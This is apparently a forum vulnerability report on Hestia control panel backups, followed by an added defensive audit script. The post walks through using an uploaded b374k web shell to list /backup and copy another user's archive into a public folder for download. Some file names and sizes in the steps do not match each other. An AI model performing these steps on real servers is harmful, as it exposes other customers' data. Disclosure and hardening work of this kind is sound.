Hi everybody,
I have been testing Hestia for a long time, and up to now I have found one very important (for me) bug.
If you upload a web shell (b374k) to someone's domain, for this example example.blog,
and you open the web shell at example.blog/webshell_b374k.php and use its command line:
pwd
/home/example/web/example.blog/public_html
ls -al
total 48956
drwxr-x--x 5 exampleuser www-data 4096 Dec 30 21:47 .
drwxr-x--x 8 exampleuser exampleuser 4096 Dec 30 16:43 ..
-rw-r--r-- 1 exampleuser exampleuser 99552 Mar 12 2021 webshell_b374k.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 css
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 30 17:58 images
-rw-r--r-- 1 exampleuser exampleuser 22324 Dec 30 18:16 index.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 js
ls -al /backup
You see all the backups for all websites:
total 58556
drwxr-xr-x 2 root root 4096 Dec 30 21:30 .
drwxr-xr-x 19 root root 4096 Oct 30 11:58 ..
-rw-r----- 1 admin test2 174080 Dec 30 05:10 test2.2021-12-30_05-10-12.tar
-rw-rw---- 1 root root 1108 Dec 30 05:10 test2.log
-rw-r----- 1 admin 1007 153600 Dec 27 05:10 zzzzzzzz.2021-12-27_05-10-15.tar
-rw-rw---- 1 root root 1093 Dec 27 05:10 zzzzzzzz.log
-rw-rw---- 1 root root 990 Dec 30 05:10 admin.log
-rw-r----- 1 admin gree 92160 Dec 30 05:10 gree.2021-12-30_05-10-05.tar
-rw-rw---- 1 root root 1100 Dec 30 05:10 gree.log
-rw-r----- 1 admin test1 8878080 Dec 30 05:10 test1.2021-12-30_05-10-14.tar
-rw-rw---- 1 root root 1087 Dec 30 05:10 test1.log
-rw-r--r-- 1 root root 49981440 Dec 30 21:21 zzzzzzzz1.2021-12-30_21-25-04.tar
-rw-rw---- 1 root root 1116 Dec 30 21:25 zzzzzzzz1.log
-rw-r----- 1 admin test3 245760 Dec 30 05:10 test3.2021-12-30_05-10-13.tar
-rw-rw---- 1 root root 1147 Dec 30 05:10 test3.log
-rw-r----- 1 admin test4 133120 Dec 30 05:10 test4.2021-12-30_05-10-15.tar
-rw-rw---- 1 root root 1059 Dec 30 05:10 test4.log
-rw-r----- 1 admin test5 235520 Dec 30 05:10 test5.2021-12-30_05-10-04.tar
-rw-rw---- 1 root root 1125 Dec 30 05:10 test5.log
-rw-rw---- 1 root root 1234 Dec 30 05:10 zzzzzzzz3.log
And after this:
cp /backup/zzzzzzzz.2021-12-27_05-10-15.tarr zzzzzzzz.2021-12-27_05-10-15.tar
total 48956
drwxr-x--x 5 exampleuser www-data 4096 Dec 30 21:47 .
drwxr-x--x 8 exampleuser exampleuser 4096 Dec 30 16:43 ..
-rw-r--r-- 1 exampleuser exampleuser 99552 Mar 12 2021 webshell_b374k.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 css
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 30 17:58 images
-rw-r--r-- 1 exampleuser exampleuser 22324 Dec 30 18:16 index.php
drwxr-xr-x 2 exampleuser exampleuser 4096 Dec 21 21:22 js
-rw-r--r-- 1 exampleuser exampleuser 49981440 Dec 30 21:47 zzzzzzzz.2021-12-27_05-10-15.tarr
After this:
example.com/zzzzzzzz.2021-12-27_05-10-15.tar
And then you can download the backups; it is very easy.
As a fix, I think it is right to store backup files in the user's directory:
/home/USER/backups
And this backup could be automatic or manual, at the user's request, in Hestia.
The problem is that the backup file does not always get a group assigned (I have no idea why).
=======
I did an experiment by creating the archive manually via the Hestia web interface, and it created the archive with the necessary ownership (chown) rights,
user:group.
This is certainly not the problem.
There is probably some automatic backup that runs sometimes and does not assign a group to the backup file, and that one is vulnerable. When I have analyzed more, I will write more on the topic.
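The listing in the post shows why only one archive could be copied: every backup that is owned admin:<user> has mode -rw-r----- (0640), so a different system user cannot read it, while zzzzzzzz1.2021-12-30_21-25-04.tar is root:root with mode -rw-r--r-- (0644), which any local user, including a web shell running as a site user, can read. The script below is an added example (not part of the original post and not HestiaCP code) that audits a backup directory for exactly that condition and strips the "other" permission bits from any archive it finds. It assumes a find that supports -maxdepth and that archives end in .tar; the file names in the demo are constructed to mirror the post and touch no real backups.

```shell
#!/bin/sh
# Added example, not HestiaCP code: find backup archives that any local user
# can read, report them, and remove the world-readable bit.
# Assumptions: find supports -maxdepth (GNU and BSD do); archives end in .tar.

# Print every *.tar directly inside DIR whose mode grants "other" read (o+r).
# -perm -004 matches when the o+r bit is set regardless of the other bits,
# so 0644 (root:root, world-readable) matches and 0640 (admin:<user>) does not.
find_exposed_backups() {
    dir=$1
    find "$dir" -maxdepth 1 -type f -name '*.tar' -perm -004 | sort
}

# Number of exposed archives in DIR, as a plain integer ("0" when clean).
exposed_count() {
    find_exposed_backups "$1" | wc -l | tr -d ' '
}

# Human-readable report: mode, owner and group of each exposed archive,
# which is what an admin wants to see before deciding on the fix.
report_exposed_backups() {
    find_exposed_backups "$1" | while IFS= read -r f; do
        ls -l "$f"
    done
}

# Remediate: drop all "other" bits from exposed archives. This closes the
# read-by-anyone hole; restoring the expected admin:<user> ownership still
# needs chown by root and is outside this script.
harden_backups() {
    find "$1" -maxdepth 1 -type f -name '*.tar' -perm -004 \
        -exec chmod o-rwx {} +
}

# Demo on a constructed directory with names modelled on the post's listing.
if [ "${1:-}" = "--demo" ]; then
    demo=$(mktemp -d)
    : > "$demo/test1.2021-12-30_05-10-14.tar"
    chmod 640 "$demo/test1.2021-12-30_05-10-14.tar"      # safe: admin:<user> style
    : > "$demo/zzzzzzzz1.2021-12-30_21-25-04.tar"
    chmod 644 "$demo/zzzzzzzz1.2021-12-30_21-25-04.tar"  # exposed: world-readable
    echo "exposed before hardening:"
    report_exposed_backups "$demo"
    harden_backups "$demo"
    echo "exposed after hardening: $(exposed_count "$demo")"
    rm -rf "$demo"
fi
```

Run it as `sh audit_backups.sh --demo` to see the before/after on the constructed directory, or call `report_exposed_backups /backup` as root on a real server. A clean result only means no archive is readable by everyone; an archive that is 0640 but group-owned by the wrong user is still readable by that group, so the ownership column in the report matters as much as the mode.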